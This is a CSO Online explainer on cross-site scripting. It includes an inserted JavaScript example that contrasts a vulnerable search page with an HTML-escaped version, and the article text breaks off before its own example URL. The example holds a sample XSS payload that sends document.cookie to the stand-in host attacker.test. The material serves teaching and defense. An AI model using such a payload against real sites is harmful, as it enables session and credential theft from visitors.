What is XSS? Cross-site scripting attacks explained | CSO Online




Cross-site scripting (XSS) is a web attack in which an attacker injects malicious code into a web form, a web application URL, or some other input that the application later writes into a page. The injected code, almost always JavaScript, runs in the victim's browser with the privileges of the site it was injected into, and can do anything from defacing the page you are trying to load to stealing your session cookies, passwords, or other login credentials.

XSS takes advantage of an important aspect of the modern web: most pages are assembled on the fly when they load, partly from data the user supplied, and sometimes by executing code in the browser itself. That can make such attacks tricky to prevent.

How XSS works

Anyone can set up a website that contains malicious code. In a cross-site scripting attack, an attacker arranges for their code to run in the victim's browser when the victim visits someone else's website. That's where the "cross" in the name comes from. XSS attacks pull this off without any privileged access to the web server; the attacker never has to plant a file on it. Instead, they take advantage of how modern web pages are assembled.

If someone asked you for a basic, entry-level explanation of the web, you would probably tell them something like this: a person who wants to create a webpage writes an HTML document, which they upload to a web server; when a user wants to access that page, they point their browser to the server's address, and the browser downloads the HTML code and interprets it to build a version of the web page for the user.

That description isn't wrong, exactly, but parts of it have been outdated for a decade or more. First of all, most web pages are now dynamic: rather than showing the same static HTML to every visitor, they are built on the fly from information in the server's database when a browser requests them. What page the browser gets back often depends on information it sends with its request, and that information sometimes takes the form of parameters in the URL used to access the site. Websites also don't consist only of HTML and cascading style sheets (CSS) that describe how text and graphics should be rendered; they include executable code written in scripting languages, usually JavaScript. Intermingling data, presentation, and executable code in this way is a sort of "original sin" of web security.
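The intermingling described above is easiest to see in code. The following is an added example, not code from the CSO Online article: a hypothetical search page that echoes a `q` URL parameter back into the HTML it returns, shown first as written (vulnerable) and then with the parameter HTML-encoded before it is concatenated into the page. The URLs, the `attacker.test` host, and the payload are constructed for the example.

```javascript
// Added example (not from the CSO Online article). Assumes a hypothetical
// search endpoint that reflects the `q` parameter into its HTML response.

// Encode the five characters that let user text break out of an HTML text
// node or a double-quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: data from the URL is concatenated straight into markup, so
// the browser parses whatever the attacker put in `q` as HTML.
function renderSearchPageVulnerable(url) {
  const q = new URL(url).searchParams.get("q") ?? "";
  return `<h1>Results for ${q}</h1>`;
}

// Hardened: the same page, but the parameter is HTML-encoded first, so the
// browser renders the attacker's text as text rather than as markup.
function renderSearchPageSafe(url) {
  const q = new URL(url).searchParams.get("q") ?? "";
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Count opening <script> tags in a response: a crude marker of whether the
// injected payload became executable markup.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed sample inputs: a benign query and an attacker-crafted link.
// The payload tries to ship the victim's cookies to an attacker-controlled host.
const BENIGN = "https://example.test/search?q=shoes";
const ATTACK =
  "https://example.test/search?q=" +
  encodeURIComponent(
    "<script>fetch('https://attacker.test/?c=' + document.cookie)</script>"
  );

console.log("vulnerable:", renderSearchPageVulnerable(ATTACK));
console.log("hardened:  ", renderSearchPageSafe(ATTACK));
console.log("script tags, vulnerable:", countScriptTags(renderSearchPageVulnerable(ATTACK)));
console.log("script tags, hardened:  ", countScriptTags(renderSearchPageSafe(ATTACK)));
```

Note that `escapeHtml` is the right encoding only for the HTML-body and quoted-attribute contexts shown here; a value written into a `<script>` block, an event-handler attribute, or a URL needs the encoding for that context, which is why templating engines that escape per context are preferred over hand-rolled concatenation.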

In an XSS attack, an attacker takes advantage of this interaction between a user and a website to get malicious code to execute in the user's browser. But how? Consider the following URL:

Copyright © 2022 IDG Communications, Inc.